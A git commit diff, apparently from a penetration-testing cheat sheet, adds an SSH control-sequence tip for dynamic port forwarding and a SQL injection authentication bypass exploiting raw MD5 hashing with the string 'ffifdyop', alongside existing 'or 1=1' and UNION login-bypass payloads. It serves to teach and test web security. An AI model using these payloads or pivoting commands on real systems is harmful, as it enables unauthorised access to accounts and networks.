Raw MD5 SQL injection + SSH Konami Code

This commit is contained in:
Swissky 2018-09-10 23:12:29 +02:00
parent 2a080f82e6
commit 7a80647e63
2 changed files with 25 additions and 0 deletions

View File

@ -25,6 +25,14 @@ ssh -N -f -D 9000 [user]@[host]
-N : do not execute a remote command
```
Cool Tip : Konami SSH Port forwarding
```bash
[ENTER] + [~C]
-D 1090
```
### Local Port Forwarding
```bash
@ -124,3 +132,4 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
* [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
* [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
* [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)

View File

@ -293,6 +293,22 @@ admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
```
## Authentication Bypass (Raw MD5)
When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
```php
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
```
Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING`
```php
md5("ffifdyop", true) = 'or'6<>]<5D><>!r,<2C><>b
```
Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772)
## Polyglot injection (multicontext)
```sql